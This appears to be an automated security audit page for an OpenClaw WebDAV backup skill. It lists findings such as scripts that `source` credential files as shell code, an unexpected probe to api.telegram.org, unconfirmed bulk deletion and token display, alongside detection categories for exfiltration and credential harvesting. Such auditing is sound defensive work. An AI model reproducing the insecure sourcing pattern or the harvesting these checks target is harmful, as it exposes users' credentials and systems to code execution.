Back to skill

Security audit

OpenClaw WebDAV Backup

Security checks across malware telemetry and agentic risk

Overview

This backup skill mostly matches its stated purpose, but it needs review because some diagnostic and migration paths can execute local config files as shell code and a restore check contacts Telegram unexpectedly.

Install only if you are comfortable with a shell-based backup tool that can read and restore your OpenClaw workspace, extensions, and config. Treat .env.backup, .env.backup.secret, .env.backup.notify, and generated migrate .env files as trusted executable inputs, use --encrypt-config before any WebDAV upload, run dry-runs before restore or deletion, and avoid sharing portable exports unless you have reviewed their contents and metadata.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (11)

Description-Behavior Mismatch

Low
Confidence
80% confidence
Finding
The generated manifest records source host metadata such as hostname, OS, OpenClaw version, and Node version without any explicit opt-in. If the archive is shared off-host, this unnecessarily exposes system inventory that can aid fingerprinting or targeted follow-on attacks.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The generated migration script uses `source "${ENV_FILE}"`, which executes the provided file as shell code rather than safely parsing key-value pairs. A malicious or tampered env file can run arbitrary commands with the privileges of the user performing migration, making this a direct code-execution vector.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The script `source`s `${ENV_FILE}` and `${SECRET_FILE}` during a health check, which executes any shell code contained in those files rather than merely validating configuration presence. If an attacker can modify either file, running the health check becomes a code-execution primitive under the user's account, which is especially risky because these files are expected to contain trusted-looking backup credentials.

Description-Behavior Mismatch

Medium
Confidence
97% confidence
Finding
The restore script includes destructive backup-management features (`--delete` and `--delete-old`) that are outside the expected scope of a restore utility. This increases the chance of accidental or induced data loss, especially because users invoking a restore-oriented tool may not anticipate deletion behavior in the same entrypoint.

Description-Behavior Mismatch

Medium
Confidence
98% confidence
Finding
A local restore utility performs an outbound connectivity probe to `https://api.telegram.org`, which is unrelated to restoring local backups. This leaks environment/network metadata to a third party and may violate isolation expectations in restricted or sensitive environments.

Context-Inappropriate Capability

Medium
Confidence
99% confidence
Finding
The explicit probe to `api.telegram.org` is unjustified for a local backup restore operation and creates unnecessary outbound traffic. In high-assurance or air-gapped environments, this can reveal host activity, trigger policy violations, or fail restores due to needless dependency on network behavior.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The script defaults to SHOW_TOKENS=1, and in full diff mode it can display configuration differences from openclaw.json to stdout. Although there is some masking logic, it is incomplete and inconsistent: secrets are only partially redacted for a few hard-coded key names and summary/full output paths behave differently, so credentials or API tokens may be exposed in terminal logs, shell history captures, CI logs, or shared support output.

Missing User Warnings

Medium
Confidence
86% confidence
Finding
The export copies the full workspace and extensions into the archive without an explicit warning or confirmation to the user. In this skill context, those directories may contain prompts, agent memory, documents, plugins, or other sensitive local data, so silent packaging increases the risk of accidental disclosure when the archive is transferred or stored offsite.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
Recording hostname and OS details in the manifest without clear user disclosure creates avoidable metadata leakage. While not code execution, this information can still reveal infrastructure details if the package is uploaded to WebDAV or shared during migration.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The script loads a secret-bearing file with `source` and gives no explicit warning that running a health check will execute contents from credential/config files. This increases the chance that operators will run it assuming it is read-only diagnostics, when in fact malicious or malformed content in those files can trigger command execution and potentially expose or misuse credentials.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
Bulk deletion of old backups occurs without an interactive confirmation step, making large-scale irreversible data loss possible from a single command or mistaken parameter. Because this logic lives in a restore script, the surprise factor further increases the risk of operator error or misuse through automation.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal

Static analysis

No suspicious patterns detected.